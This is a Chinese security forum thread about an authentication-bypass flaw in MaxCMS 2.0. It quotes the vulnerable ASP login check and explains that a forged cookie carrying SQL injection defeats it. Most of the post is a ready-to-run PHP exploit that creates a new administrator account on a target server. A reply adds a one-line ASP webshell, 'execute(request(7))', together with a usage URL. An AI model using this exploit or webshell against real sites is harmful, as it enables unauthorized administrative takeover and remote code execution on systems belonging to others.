You are not logged in.
欢迎cnryan同学加入狼族:-)
by flyh4t
maxcms后台有自动升级功能,ajax的那个注射被修补了,但是这个漏洞还是没有修补。
在上一贴有同学问是否能绕过认证,答案是肯定的,但是前提是要知道后台目录地址
回顾下漏洞代码
Sub checkPower
dim loginValidate,rsObj : loginValidate = "maxcms2.0"
err.clear
on error resume next
set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")
loginValidate = md5(getAgent&getIp&rsObj(0))
if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
checkManagerLevel rsObj(1)
set rsObj=nothing
End Sub其中
Function rCookie(cookieName)
rCookie = request.cookies(cookieName)
End Function关键就是这个变量的值 loginValidate = md5(getAgent&getIp&rsObj(0))
通过伪造cookie可以轻松绕过这段认证代码,之后就可以添加新管理员或者修改配置文件插入一句话木马
我这里贴一个添加新管理员的exp
<?php
print_r('
+---------------------------------------------------------------------------+
maxcms2.0 creat new admin exploit
by Flyh4t
team:wolvez security team
site:bbs.wolvez.org
dork:salemax#qq.com
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';
$resp = send($cmd);
if (!eregi('alert',$resp)) {echo"[~]bad luck,exploit failed";exit;}
print_r('
+---------------------------------------------------------------------------+
[+]cool,exploit seccuss
[+]you have add a new adminuser flyh4t'.$name.'/wolvez
+---------------------------------------------------------------------------+
');
function send($cmd)
{
global $host, $path;
$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: http://$host$path\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: flyh4t\r\n";
$message .= "X-Forwarded-For:1.1.1.1\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Cookie: m_username=flyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checkflyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
echo $message;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
return $resp;
}
?>Last edited by flyh4t (2009-02-07 19:32:07)
Offline
哈哈 楼上的不错
asp还支持//注释~~ 学习了
<%
test = "luoye":execute(request(7))//"
%>
xx.asp?7=response.write("zzzzzzzzzzzzzxxx")
不知道asp除了单引号注释和//注释还支持啥注释?
Offline